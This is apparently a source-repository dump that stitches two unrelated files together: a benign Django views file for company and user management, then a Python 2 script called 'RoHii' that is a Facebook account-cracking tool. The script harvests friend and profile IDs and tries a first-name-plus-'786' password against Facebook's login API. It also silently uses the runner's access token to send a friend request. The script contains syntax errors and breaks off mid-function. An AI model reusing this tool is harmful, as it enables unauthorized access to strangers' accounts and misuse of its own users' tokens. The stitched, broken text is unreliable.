            return render(request, 'company_form_add.html')
        else:
            return HttpResponseRedirect(reverse("index"))
    def post(self, request):
        try:
            permission = request.user.permission
            print(permission)
            if permission != "superadmin":
                return JsonResponse({"status": "fail", "errors": "无权限"})
            serializer = CompanySerializer(data=request.POST)
            phone = request.POST["phone"]
            if UserProfile.objects.filter(username=phone).count() > 0:
                # The phone number doubles as the admin username, so it must be free.
                return JsonResponse({"status": "fail", "errors": "该电话号码的用户已经存在"})
            if serializer.is_valid():
                newcompany = serializer.save()
                UserProfile.objects.create_user(username=phone, password=DEFAULT_PASSWORD, company=newcompany,
                                                permission="admin")
                create_history_record(request.user, "新建公司%s,管理员%s" % (newcompany.company_name, phone))
                return JsonResponse({"status": "success"})
            return JsonResponse({"status": "fail", "errors": "新建公司失败"})
        except Exception as e:
            print(e)
            # A duplicate (unique) company name typically lands here.
            return JsonResponse({
                "status": "fail",
                "errors": "公司名称唯一"
            })
class CompanyView(LoginRequiredMixin, View):
    """Company list page with the admin accounts (superadmin only)."""
    def get(self, request):
        permission = request.user.permission
        print(permission)
        if permission == 'superadmin':
            all_company = CompanyModel.objects.all().order_by('id')
            all_admin_user = UserProfile.objects.filter(permission='admin')
            return render(request, 'company_info.html', {"all_company": all_company, "all_admin_user": all_admin_user})
        else:
            return HttpResponseRedirect(reverse("index"))
class DelCompanView(LoginRequiredMixin, View):
    """Delete a company (superadmin only); refused while it still owns devices."""
    def post(self, request):
        permission = request.user.permission
        print(permission)
        if permission == 'superadmin':
            try:
                company_id = request.POST.get('company_id', "")
                dev_infos = DevicesInfo.objects.filter(company_id=company_id)
                company = CompanyModel.objects.filter(id=company_id)
                if dev_infos:
                    # Guard: never orphan devices by deleting their company.
                    return JsonResponse({"status": "fail", "msg": "该公司下有设备,禁止删除。"})
                # company[0] raises IndexError for an unknown id — caught below.
                company_name = company[0].company_name
                company.delete()
                create_history_record(request.user, '删除公司 %s' % company_name)
                return JsonResponse({"status": "success"})
            except Exception as e:
                print(e)
                return JsonResponse({"status": "fail", "msg": str(e)})
        else:
            return HttpResponseRedirect(reverse("index"))
# 1104重写app html api json
class LoginApiView(APIView):
    """
    JSON login endpoint: authenticates, logs the session in, and returns
    the user's permission level and company (empty strings when the
    account has no company).
    """
    def post(self, request):
        try:
            username = request.data.get('username')
            password = request.data.get('password')
            user = authenticate(username=username, password=password)
            if user is not None:
                # is_active: account enabled?
                if user.is_active:
                    login(request, user)
                    create_history_record(user, "app登录")
                    permission = user.permission
                    company_id = user.company
                    company_name = user.company
                    # user.company may be None; flatten to "" for the client.
                    if company_id:
                        company_id = company_id.id
                    else:
                        company_id = ""
                    if company_name:
                        company_name = company_name.company_name
                    else:
                        company_name = ""
                    return JsonResponse({
                        "permission": permission, "company_id": company_id, "error_no": 0,
                        "company_name": company_name
                    })
                else:
                    return JsonResponse({
                        "error_no": 3,
                        "info": "not active"
                    })
            else:
                return JsonResponse({
                    "error_no": -3,
                    "info": "username or password wrong"
                })
        except UserProfile.DoesNotExist:
            return JsonResponse({
                "error_no": -2,
                "info": "没有这个用户"
            })
        except Exception as e:
            print(e)
            return JsonResponse({
                "error_no": -1,
                "info": str(e)
            })
class ResetPasswordApiView(APIView):
    """
    JSON endpoint: reset another account's password to DEFAULT_PASSWORD.

    Superadmins may reset anyone; admins only non-admin accounts of
    their own company.  The caller is identified by the HTTP_USERNAME
    header.
    """
    def post(self, request):
        try:
            username = request.META.get("HTTP_USERNAME")
            user_id = request.data.get('user_id')
            user = UserProfile.objects.get(username=username)
            permission = user.permission
            if permission not in ['superadmin', 'admin']:
                return JsonResponse({
                    "error_no": 2,
                    "info": "您没有权限重置密码"
                })
            if permission == 'superadmin':
                userinfo = UserProfile.objects.get(id=user_id)
            else:
                # Admins can only touch accounts of their own company...
                userinfo = UserProfile.objects.get(id=user_id, company_id=user.company_id)
                # ...and never other admins/superadmins.
                if userinfo.permission in ('admin', 'superadmin'):
                    return JsonResponse({
                        "error_no": -2,
                        "info": "您没有权限重置密码"
                    })
            # BUG FIX: the admin branch previously returned "重置密码成功"
            # without ever resetting the password; the actual reset,
            # audit record and notification are now shared by both roles.
            userinfo.password = make_password(DEFAULT_PASSWORD)
            userinfo.save()
            create_history_record(username, '重置%s的密码' % userinfo.username)
            make_message(userinfo.username, "已重置密码,请立即修改密码!", -1)
            return JsonResponse({
                "error_no": 0,
                "info": "重置密码成功"
            })
        except UserProfile.DoesNotExist:
            return JsonResponse({
                "error_no": -2,
                "info": "没有这个用户"
            })
        except Exception as e:
            print(e)
            return JsonResponse({
                "error_no": -1,
                "info": str(e)
            })
class ChangePasswordApiView(APIView):
    """
    Shared change-password API: verifies the old password, requires the
    two new passwords to match, then stores the new hash.
    """
    def post(self, request):
        try:
            name = request.data.get('username', '')
            old_password = request.data.get('old_password', '')
            new_password = request.data.get('password1', '')
            confirmation = request.data.get('password2', '')
            user = authenticate(username=name, password=old_password)
            if user is None:
                return JsonResponse({
                    "error_no": 1,
                    "info": "用户名或密码错误"
                })
            if new_password != confirmation:
                return JsonResponse({
                    "error_no": 1,
                    "info": "两次密码不一致"
                })
            userinfo = UserProfile.objects.get(username=user)
            userinfo.password = make_password(new_password)
            userinfo.save()
            create_history_record(user, "修改密码")
            return JsonResponse({
                "error_no": 0,
                "info": "Success"
            })
        except Exception as e:
            print(e)
            return JsonResponse({
                "error_no": -1,
                "info": str(e)
            })
class UserInfoApiView(APIView):
    """
    Shared user CRUD API.

    Superadmins operate on every user; admins only on users of their
    own company.  Every request identifies the caller through the
    HTTP_USERNAME header.
    """
    def get(self, request):
        """List the users visible to the caller."""
        try:
            username = request.META.get("HTTP_USERNAME")
            users = UserProfile.objects.get(username=username)
            permission = users.permission
            if permission == 'superadmin':
                all_users = UserProfile.objects.all().order_by('company_id')
                serializer = UserProfileSerializer(all_users, many=True)
            elif permission == 'admin':
                company_id = users.company_id
                all_users = UserProfile.objects.filter(company_id=company_id).order_by('id')
                serializer = UserProfileSerializer(all_users, many=True)
            else:
                return JsonResponse({"error_no": 2, "info": "你没有权限修改"})
            data = {
                "data": serializer.data,
                "error_no": 0
            }
            create_history_record(username, "查询用户列表")
            return JsonResponse(data)
        except UserProfile.DoesNotExist:
            return JsonResponse({
                "error_no": -2,
                "info": "没有这个用户"
            })
        except Exception as e:
            print(e)
            return JsonResponse({
                "error_no": -1,
                "info": str(e)
            })
    def post(self, request):
        """Create a user; the password defaults to DEFAULT_PASSWORD."""
        try:
            username = request.META.get("HTTP_USERNAME")
            newusername = request.data.get("newuser")
            phone = request.data.get("phone")
            password = request.data.get("password")
            if not password:
                # Consistency fix: shared default instead of a magic literal.
                password = DEFAULT_PASSWORD
            company_name = request.data.get("company_name")
            perm = request.data.get("permission")
            user = UserProfile.objects.get(username=username)
            permission = user.permission
            if permission == 'superadmin':
                # Superadmin may target any company by name.
                company_id = CompanyModel.objects.get(company_name=company_name).id
                UserProfile.objects.create_user(username=newusername, password=password, mobile=phone,
                                                company_id=company_id, permission=perm)
            elif permission == 'admin':
                # Admin is locked to their own company.
                company_id = user.company_id
                UserProfile.objects.create_user(username=newusername, password=password, mobile=phone,
                                                company_id=company_id, permission=perm)
            else:
                return JsonResponse({"error_no": -2, "info": "没有权限新增用户"})
            create_history_record(username,
                                  "新增用户%s-%s" % (CompanyModel.objects.get(id=company_id).company_name, newusername))
            return JsonResponse({"error_no": 0, "info": "Success"})
        except UserProfile.DoesNotExist:
            return JsonResponse({
                "error_no": -2,
                "info": "没有这个用户"
            })
        except CompanyModel.DoesNotExist:
            return JsonResponse({
                "error_no": -2,
                "info": "没有这个公司"
            })
        except Exception as e:
            print(e)
            return JsonResponse({
                "error_no": -1,
                "info": str(e)
            })
    def put(self, request):
        """
        Change a user's permission level only (never to superadmin).
        """
        try:
            username = request.META.get("HTTP_USERNAME")
            perm = request.data.get("permission")
            modify_username = request.data.get("username")
            user = UserProfile.objects.get(username=username)
            permission = user.permission
            if perm == 'superadmin':
                # Nobody may promote an account to superadmin through this API.
                return JsonResponse({"error_no": -2, "info": "你没有权限修改"})
            if permission == 'superadmin':
                modify_user = UserProfile.objects.get(username=modify_username)
                modify_user.permission = perm
                modify_user.save()
                create_history_record(username,
                                      "修改用户%s权限为%s" % (modify_user.username, modify_user.get_permission_display()))
                return JsonResponse({"error_no": 0, "info": "Success"})
            elif permission == 'admin':
                company_id = user.company.id
                modify_user = UserProfile.objects.get(username=modify_username, company_id=company_id)
                modify_user.permission = perm
                modify_user.save()
                create_history_record(username,
                                      "修改用户%s权限为%s" % (modify_user.username, modify_user.get_permission_display()))
                return JsonResponse({"error_no": 0, "info": "Success"})
            else:
                return JsonResponse({"error_no": -2, "info": "你没有权限修改"})
        except UserProfile.DoesNotExist:
            return JsonResponse({
                "error_no": -2,
                "info": "没有这个用户"
            })
        except Exception as e:
            print(e)
            return JsonResponse({
                "error_no": -1,
                "info": str(e)
            })
    def delete(self, request):
        """Delete a user; admin/superadmin accounts are protected."""
        try:
            username = request.META.get("HTTP_USERNAME")
            delete_username = request.data.get("username")
            admin_user = UserProfile.objects.get(username=username)
            del_user = UserProfile.objects.get(username=delete_username)
            admin_permission = admin_user.permission
            del_user_permission = del_user.permission
            # BUG FIX: the original test used
            # "!= 'admin' or != 'superadmin'", which is a tautology
            # (always true), so a superadmin could delete other
            # admins/superadmins despite the evident intent.
            if admin_permission == "superadmin" and del_user_permission not in ('admin', 'superadmin'):
                del_user.delete()
                create_history_record(username, "删除用户" + delete_username)
                return JsonResponse({"error_no": 0, "info": "Success"})
            elif admin_permission == 'admin':
                company_id = admin_user.company.id
                del_user = UserProfile.objects.get(username=delete_username, company_id=company_id)
                if del_user and del_user.permission != 'admin':
                    del_user.delete()
                    create_history_record(username, "删除用户" + delete_username)
                    return JsonResponse({"error_no": 0, "info": "Success"})
                else:
                    return JsonResponse({"error_no": -3, "info": "该公司下没有此用户,或权限不足"})
            else:
                return JsonResponse({"error_no": -3, "info": "权限不足"})
        except UserProfile.DoesNotExist:
            return JsonResponse({
                "error_no": -2,
                "info": "没有这个用户"
            })
        except Exception as e:
            print(e)
            return JsonResponse({
                "error_no": -1,
                "info": str(e)
            })
class CompanyApiView(APIView):
    """
    Shared company management API (superadmin only).
    """
    def get(self, request):
        """List every company together with its member usernames."""
        try:
            username = request.META.get("HTTP_USERNAME")
            user = UserProfile.objects.get(username=username)
            permission = user.permission
            data = list()
            if permission == 'superadmin':
                all_company = CompanyModel.objects.all().order_by('id')
                for company in all_company:
                    admin_user = UserProfile.objects.filter(company=company)
                    admin = [u.username for u in admin_user]
                    data.append({
                        "id": company.id,
                        "company_name": company.company_name,
                        "contact": company.contact,
                        "phone": company.phone,
                        "status": company.company_status,
                        "admin": admin
                    })
                create_history_record(username, "查询所有公司")
                return JsonResponse({
                    "data": data,
                    "error_no": 0
                })
            else:
                return JsonResponse({"error_no": -2, "info": "你没有权限"})
        except UserProfile.DoesNotExist:
            return JsonResponse({
                "error_no": -2,
                "info": "没有这个用户"
            })
        except Exception as e:
            print(e)
            return JsonResponse({
                "error_no": -1,
                "info": str(e)
            })
    def post(self, request):
        """Create a company plus its 'admin' account (username = phone)."""
        try:
            username = request.META.get("HTTP_USERNAME")
            user = UserProfile.objects.get(username=username)
            permission = user.permission
            if permission != "superadmin":
                return JsonResponse({"error_no": -2, "info": "无权限"})
            serializer = CompanySerializer(data=request.data)
            phone = request.data["phone"]
            if UserProfile.objects.filter(username=phone).count() > 0:
                # The phone number doubles as the admin username, so it must be free.
                return JsonResponse({"error_no": -3, "info": "该电话号码的用户已经存在"})
            if serializer.is_valid():
                newcompany = serializer.save()
                UserProfile.objects.create_user(username=phone, password=DEFAULT_PASSWORD, company=newcompany,
                                                permission="admin")
                create_history_record(username, "新建公司%s,管理员%s" % (newcompany.company_name, phone))
                return JsonResponse({"error_no": 0, "info": "Success"})
            return JsonResponse({"error_no": -2, "info": "新建公司失败"})
        except UserProfile.DoesNotExist:
            return JsonResponse({
                "error_no": -2,
                "info": "没有这个用户"
            })
        except Exception as e:
            print(e)
            return JsonResponse({
                "error_no": -1,
                "info": str(e)
            })
    def put(self, request):
        """Update a company's name, contact, phone and status."""
        try:
            username = request.META.get("HTTP_USERNAME")
            user = UserProfile.objects.get(username=username)
            permission = user.permission
            if permission != "superadmin":
                return JsonResponse({"error_no": -2, "info": "无权限"})
            company_id = request.data.get("company_id")
            company_name = request.data.get("company_name")
            company_status = request.data.get("company_status")
            contact = request.data.get("contact")
            phone = request.data.get("phone")
            company = CompanyModel.objects.get(id=company_id)
            company.company_name = company_name
            company.contact = contact
            company.phone = phone
            company.company_status = company_status
            company.save()
            create_history_record(username, "修改公司" + company.company_name)
            return JsonResponse({"error_no": 0, "info": "Success"})
        except UserProfile.DoesNotExist:
            return JsonResponse({
                "error_no": -2,
                "info": "没有这个用户"
            })
        except CompanyModel.DoesNotExist:
            return JsonResponse({
                "error_no": -2,
                "info": "没有这个公司"
            })
        except Exception as e:
            print(e)
            return JsonResponse({
                "error_no": -1,
                "info": str(e)
            })
    def delete(self, request):
        """Delete a company together with all of its user accounts."""
        try:
            username = request.META.get("HTTP_USERNAME")
            user = UserProfile.objects.get(username=username)
            permission = user.permission
            if permission != "superadmin":
                return JsonResponse({"error_no": -2, "info": "无权限"})
            company_id = request.data['company_id']
            company = CompanyModel.objects.get(id=company_id)
            # BUG FIX: capture the affected usernames BEFORE deleting.
            # Previously the queryset was iterated after .delete(), which
            # re-evaluates it (now empty), so the audit record always
            # listed no users; deleting the company first could also
            # cascade-remove them depending on the FK's on_delete.
            members = UserProfile.objects.filter(company=company_id)
            member_names = [u.username for u in members]
            company_name = company.company_name
            members.delete()
            company.delete()
            create_history_record(username, "删除公司%s,用户%s" % (company_name, member_names))
            return JsonResponse({"error_no": 0, "info": "Success"})
        except CompanyModel.DoesNotExist:
            return JsonResponse({
                "error_no": -2,
                "info": "没有这个公司"
            })
        except Exception as e:
            print(e)
            return JsonResponse({
                "error_no": -1,
                "info": str(e)
            })
class MessageApiView(APIView):
    """
    Notification API: GET lists the caller's messages; POST marks one
    message (msg_id) — or all of them (all_read=1) — as read.
    """
    def get(self, request):
        try:
            username = request.META.get("HTTP_USERNAME")
            all_message = Message.objects.filter(username__username=username)
            message_ser = MessageSerializer(all_message, many=True)
            return JsonResponse({
                "error_no": 0,
                "info": "Success",
                "data": message_ser.data
            })
        except UserProfile.DoesNotExist:
            return JsonResponse({
                "error_no": -2,
                "info": "没有这个用户"
            })
        except Exception as e:
            print(e)
            return JsonResponse({
                "error_no": -1,
                "info": str(e)
            })
    def post(self, request):
        try:
            username = request.META.get("HTTP_USERNAME")
            msg_id = request.data.get('msg_id')
            all_read = request.data.get('all_read')
            if all_read == "1" and not msg_id:
                # Bulk path: mark everything of this user as read.
                Message.objects.filter(username__username=username).update(has_read=True)
            else:
                message = Message.objects.get(username__username=username, id=msg_id)
                message.has_read = True
                message.save()
            return JsonResponse({
                "error_no": 0
            })
        except Message.DoesNotExist:
            return JsonResponse({
                "error_no": -2,
                "info": "没有这个消息"
            })
        except Exception as e:
            print(e)
            return JsonResponse({
                "error_no": -1,
                "info": str(e)
            })
class SystemStationView(LoginRequiredMixin, View):
    """Station list for system settings.

    Superadmins see every station; everyone else only the stations of
    their own company (or an empty list when no company is bound).
    """
    def get(self, request):
        permission = request.user.permission
        print(permission)
        if permission == 'superadmin':
            all_station = StationInfo.objects.all()
        else:
            try:
                company = request.user.company.company_name
            except Exception as e:
                # Account without a company: bounce back to the index page.
                print(e)
                return HttpResponseRedirect(reverse('index'))
            if company:
                all_station = StationInfo.objects.filter(company__company_name=company)
            else:
                all_station = ""
        create_history_record(request.user, '系统设置查询所有测站点')
        return render(request, 'sys_station.html', {
            "all_station": all_station,
        })
# TODO 目前为全局设置,以后会绑定到站点上
class SystemSettingsView(LoginRequiredMixin, View):
    """Per-station threshold/alarm settings.

    GET renders the settings page, creating an all-zero settings row the
    first time a station is visited.  Non-superadmins may only reach
    stations that belong to their own company.  POST creates or updates
    the settings via SystemSettingsForm.
    """
    @staticmethod
    def _create_default(station_id):
        # First visit for this station: start from an all-zero record.
        return SystemSettings.objects.create(station_id=station_id, water_min_level=0,
                                             water_max_level=0, flow_min_level=0, flow_max_level=0,
                                             deviate_value=0, volt_value=0, is_alarm=0)
    def get(self, request, station_id):
        permission = request.user.permission
        if permission == 'superadmin':
            try:
                sys_settings = SystemSettings.objects.get(station_id=station_id)
            except SystemSettings.DoesNotExist:
                sys_settings = self._create_default(station_id)
            return render(request, 'sys_settings.html', {"sys_settings": sys_settings})
        try:
            company = request.user.company.company_name
        except Exception as e:
            # Account without a company: back to the station list.
            print(e)
            return HttpResponseRedirect(reverse('sys_station'))
        if company and StationInfo.objects.filter(id=station_id, company__company_name=company):
            try:
                sys_settings = SystemSettings.objects.get(station_id=station_id,
                                                          station__company__company_name=company)
            except SystemSettings.DoesNotExist:
                sys_settings = self._create_default(station_id)
            return render(request, 'sys_settings.html', {"sys_settings": sys_settings})
        return HttpResponseRedirect(reverse('sys_station'))
    def post(self, request, station_id):
        sys_id = request.POST.get('sys_id')
        if sys_id:
            # Existing settings row: update it in place.
            sys_settings = SystemSettings.objects.get(id=sys_id)
            settings_form = SystemSettingsForm(request.POST, instance=sys_settings)
            if settings_form.is_valid():
                settings_form.save()
                create_history_record(request.user, "修改系统设置")
                return JsonResponse({"status": "success", "msg": "修改设置成功"})
            print(settings_form.errors)
            # BUG FIX: the failure branch used to answer with the success
            # message "修改设置成功" despite status "fail".
            return JsonResponse({
                "status": "fail",
                "msg": "修改设置失败",
            })
        settings_form = SystemSettingsForm(request.POST)
        if settings_form.is_valid():
            settings_form.save()
            create_history_record(request.user, "设置系统设置")
            return JsonResponse({"status": "success", "msg": "设置成功"})
        print(settings_form.errors)
        return JsonResponse({
            "status": "fail",
            "msg": "设置失败",
        })
| [
"569578851@qq.com"
] | 569578851@qq.com |
703e0d49a29534beecd05b5fb4f1fd007feb877c | c820df8279e788e88a2e5476a781228bf15075ad | /RoHii | 2fa6294c4d68a5ea5f89f70bbe5c4d4555094f8f | [] | no_license | ROoHii/RoHll | c7ead0fcdaf8477029725e212f11099bff2713d7 | 3103bbde23f36763ecfc0171f03ea7e8831c0daf | refs/heads/main | 2023-01-03T04:35:59.108306 | 2020-10-30T09:19:29 | 2020-10-30T09:19:29 | 308,580,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,316 | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """
\033[1;91m 🤒💋💉———————————————————————————————💋🤒💉
\033[1;96m ╭━━━╮╱╱╭╮╱╭╮
\033[1;96m ┃╭━╮┃╱╱┃┃╱┃┃⚡
\033[1;96m ┃╰━╯┣━━┫╰━╯┣┳╮
\033[1;96m ┃╭╮╭┫╭╮┃╭━╮┣╋┫|
\033[1;96m ┃┃┃╰┫╰╯┃┃╱┃┃┃┃
\033[1;96m ╰╯╰━┻━━┻╯╱╰┻┻╯|
\033[1;96m | |
\033[1;96m |_| RoHii UpDAtED 0.3
\033[1;91m 💉🤒💋———————————————————————————————💉🤒💋
"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;97m ╭━━━╮╱╱╭╮╱╭╮
\033[1;92m ┃╭━╮┃╱╱┃┃╱┃┃Updated✔
\033[1;97m ┃╰━╯┣━━┫╰━╯┣┳╮
\033[1;92m ┃╭╮╭┫╭╮┃╭━╮┣╋┫
\033[1;97m ┃┃┃╰┫╰╯┃┃╱┃┃┃┃
\033[1;97m ╰╯╰━┻━━┻╯╱╰┻┻╯
"""
jalan("\033[1;97m•◈•───────•◈ RoHii sHuNa''z kA sHuNa" •◈•───────•◈•")
jalan("\033[1;96m•◈• _____ _____ ______ ______ _____ _____ ")
jalan("\033[1;96m•◈• ______ ______ __ __ __ __ ")
jalan("\033[1;97m•◈• /\ == \ /\ __ \ /\ \_\ \ /\ \ /\ \ ")
jalan("\033[1;96m•◈• \ \ __< \ \ \/\ \ \ \ __ \ \ \ \ \ \ \ ")
jalan("\033[1;96m•◈• \ \_\ \_\ \ \_____\ \ \_\ \_\ \ \_\ \ \_\ ")
jalan("\033[1;96m•◈• \/_/ /_/ \/_____/ \/_/\/_/ \/_/ \/_/|")
jalan(" \033[1;91m INDAIN USERZ USE ANY PROXY ")
jalan(" \033[1;91m WIFI USERZ USE ANY PROXY ")
jalan(" \033[1;93m Welcome to RoHii Creations ")
jalan("\033[1;97m•◈•──────────•◈•\033[1;96mBlacktiger\033[1;96m•◈•──────────•◈•")
CorrectUsername = "rohii"
CorrectPassword = "rohii"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;97mUSER ID \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;97mPASWORD \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "Wrong Password"
os.system('xdg-open https://www.youtube.com/channel/UCd77mzzS0Cmd9oCScb8VRLw
else:
print "Wrong Username"
os.system('xdg-open https://www.youtube.com/channel/UCd77mzzS0Cmd9oCScb8VRLw
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 50*"\033[1;96m▪"
print(' \033[1;97m[◉] \x1b[1;96mLogin New Fresh Account \033[1;97m[◉]' )
id = raw_input(' \033[1;97m[◉] \033[1;97mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input(' \033[1;97m[◉] \033[1;97mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\x1b[1;36;40m[✓] Login Successful...'
os.system('xdg-open https://www.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;97m[!] There is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;97m[!] Your Account is on Checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;97mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;97m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print"\033[1;97mYour Account is on Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;97mThere is no internet connection"
keluar()
os.system("clear")
print logo
print " \033[1;36;40m ╔═════════════════════════════════╗"
print " \033[1;36;40m ║\033[1;32;40m[*] Name\033[1;32;40m: "+nama+" \033[1;36;40m║"
print " \033[1;36;40m ║\033[1;34;40m[*] ID \033[1;34;40m: "+id+" \033[1;36;40m║"
print " \033[1;36;40m ║\033[1;34;40m[*] Subs\033[1;34;40m: "+sub+" \033[1;36;40m║"
print " \033[1;36;40m ╚═════════════════════════════════╝"
print "\033[1;32;40m[1] \033[1;33;40m══Start Hack3ing"
print "\033[1;32;40m[2] \033[1;33;40m══Update Aahil"
print "\033[1;32;40m[0] \033[1;33;40m══Log out"
pilih()
def pilih():
unikers = raw_input("\n\033[1;31;40m>>> \033[1;35;40m")
if unikers =="":
print "\033[1;97mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
os.system('clear')
print logo
print " \033[1;36;40m●════════════════════════◄►════════════════════════●\n"
os.system('git pull origin master')
raw_input('\n\033[1;97m[ \033[1;97mBack \033[1;97m]')
menu()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;97mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\x1b[1;32;40m[1] \033[1;33;40m══Hack From Friend List"
print "\x1b[1;32;40m[2] \033[1;33;40m══Hack From Public ID"
print "\x1b[1;32;40m[3] \033[1;33;40m══Hack Bruteforce"
print "\x1b[1;32;40m[4] \033[1;33;40m══Hack From File"
print "\x1b[1;32;40m[0] \033[1;33;40m══Back RoHii''
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;31;40m>>> \033[1;97m")
if peak =="":
print "\033[1;97mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
jalan('\033[1;97m[✺] Getting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
idt = raw_input("\033[1;97m[*] Enter ID : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;31;40m[✺] Name : "+op["name"]
except KeyError:
print"\033[1;97m[✺] ID Not Found!"
raw_input("\n\033[1;97m[\033[1;97mBack\033[1;97m]")
super()
print"\033[1;35;40m[✺] Getting IDs..."
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
brute()
elif peak =="4":
os.system('clear')
print logo
try:
idlist = raw_input('\033[1;97m[+] \033[1;97mEnter the file name \033[1;97m: \033[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;35;40m[!] \x1b[1;35;40mFile not found'
raw_input('\n\x1b[1;35;40m[ \x1b[1;35;40mExit \x1b[1;35;40m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;97mFill in correctly"
pilih_super()
print "\033[1;36;40m[✺] Total IDs : \033[1;97m"+str(len(id))
jalan('\033[1;34;40m[✺] Please Wait...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;32;40m[✺] Cloning\033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;97m ❈ \033[1;97mTo Stop Process Press CTRL+Z \033[1;97m ❈"
print " \033[1;31;48m●💋══════════════════◄►══════════════════💋●"
jalan(' \033[1;97mRoHii start cloning Wait...')
print " \033[1;36;48m ●💋══════════════════◄►══════════════════💋●"
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \033[1;97m | \033[1;97m ' + pass1 + ' 👽 ' + b['name']
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass1 + ' 👽 ' + b['name']
